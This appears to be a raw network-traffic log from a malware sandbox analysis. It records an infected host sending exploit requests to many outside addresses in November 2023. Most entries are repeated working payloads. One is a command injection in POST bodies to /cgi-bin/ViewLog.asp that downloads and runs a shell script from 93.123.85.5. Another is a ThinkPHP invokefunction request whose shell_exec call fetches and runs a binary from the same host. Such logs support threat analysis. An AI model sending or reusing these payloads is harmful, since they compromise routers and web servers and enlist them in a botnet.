                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              646192.168.2.235275894.122.227.1168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.687673092 CET13040OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              647192.168.2.234568231.200.44.2108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.687707901 CET13041OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              648192.168.2.235310895.86.86.148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.691260099 CET13041OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              649192.168.2.234221631.47.126.1348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.692451000 CET13042OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              65192.168.2.235752288.160.227.14180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:19.623488903 CET2465OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:19.938263893 CET2571INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:19 GMT
                                                              Server: Apache/2.4.54 (Raspbian)
                                                              Content-Length: 303
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Raspbian) Server at 127.0.1.1 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              650192.168.2.234864895.86.119.488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.707475901 CET13066OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              651192.168.2.235162688.221.33.5280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.032372952 CET13095OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.260657072 CET13105INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 37 64 64 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 38 36 26 23 34 36 3b 36 34 33 63 32 39 30 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9d7dd17&#46;1699910386&#46;643c290a</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              652192.168.2.233992888.76.215.23180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.144268990 CET13101OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.479876995 CET13114INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              653192.168.2.235752288.209.238.13880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.155287981 CET13102OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:46.500405073 CET13116INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:45 GMT
                                                              Server:
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              654192.168.2.234027488.249.181.6780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.178452969 CET13103OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              655192.168.2.234173895.179.181.588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.276171923 CET13106OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.566493034 CET13118INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx/1.18.0-nano
                                                              Date: Mon, 13 Nov 2023 21:19:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 174
                                                              Connection: keep-alive
                                                              Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 2d 6e 61 6e 6f 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0-nano</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              656192.168.2.235594831.136.229.1578080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.378674030 CET13108OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.367456913 CET13242OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.351208925 CET13503OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414638996 CET14031OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.349664927 CET15003OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.219600916 CET17032OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:50.239145041 CET20676OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              657192.168.2.234569231.136.158.688080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.378963947 CET13108OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.367441893 CET13242OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.351208925 CET13503OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414621115 CET14031OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.349669933 CET15004OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.219580889 CET17031OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:50.239152908 CET20676OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              658192.168.2.235994695.180.231.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:46.385879993 CET13109OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
